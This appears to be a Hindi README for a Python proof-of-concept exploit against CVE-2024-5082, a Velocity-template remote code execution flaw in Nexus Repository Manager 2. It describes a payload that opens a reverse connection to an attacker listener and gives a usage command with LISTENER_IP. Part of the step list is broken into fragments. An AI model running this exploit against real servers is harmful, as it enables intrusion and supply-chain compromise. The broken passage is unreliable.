
CVE-2024-5082 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Sonatype Nexus Repository Manager 2 में तैयार किए गए Maven आर्टिफैक्ट्स और Velocity टेम्पलेट प्रोसेसिंग के माध्यम से रिमोट कोड एक्ज़ीक्यूशन भेद्यता है।
इस रिपॉजिटरी में CVE-2024-5082 के लिए एक Python प्रूफ ऑफ कॉन्सेप्ट शामिल है, जो Sonatype Nexus Repository Manager 2 में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता है।
यह भेद्यता एक उपयोगकर्ता को, जिसके पास पर्याप्त अनुमति है, एक विशेष रूप से तैयार किया गया Maven आर्टिफैक्ट प्रकाशित करने और उसे Velocity कंटेंट जनरेटर द्वारा प्रोसेसिंग के लिए चिह्नित करने की अनुमति देती है। जब आर्टिफैक्ट को पुनः प्राप्त किया जाता है, तो एम्बेडेड Velocity टेम्पलेट का मूल्यांकन Nexus द्वारा किया जाता है और यह Nexus JVM के सुरक्षा संदर्भ में एक कमांड निष्पादित कर सकता है।
Sonatype के अनुसार:
कमांड Nexus Repository होस्ट पर निष्पादित होता है।
किसी बिल्ड सर्वर, एप्लिकेशन सर्वर, या डेवलपर वर्कस्टेशन से प्रभावित आर्टिफैक्ट डाउनलोड करने से स्वयं उस उपभोक्ता सिस्टम पर एम्बेडेड कमांड निष्पादित नहीं होती है। हालाँकि, रिपॉजिटरी मैनेजर से समझौता होने पर व्यापक सप्लाई-चेन जोखिम पैदा हो सकता है, यदि कोई हमलावर बाद में विश्वसनीय आर्टिफैक्ट, बिल्ड इनपुट, क्रेडेंशियल्स, या रिपॉजिटरी कॉन्फ़िगरेशन को संशोधित करता है।
स्क्रिप्ट:
maven-metadata.xml फ़ाइल अपलोड करती है।velocity पर सेट हो।आपूर्ति किया गया पेलोड Nexus होस्ट से कॉन्फ़िगर किए गए लिसनर पते पर एक आउटबाउंड TCP कनेक्शन बनाता है।
वर्तमान स्क्रिप्ट HTTP बेसिक प्रमाणीकरण का उपयोग करती है और इसके लिए आवश्यक है:
python3 cve_2024_5082.py \\
--base-url https://nexus.example.test/nexus \\
--repository security-test-snapshots \\
--username test-user \\
--password 'REDACTED' \\
--lhost LISTENER_IP \\
--lport 8000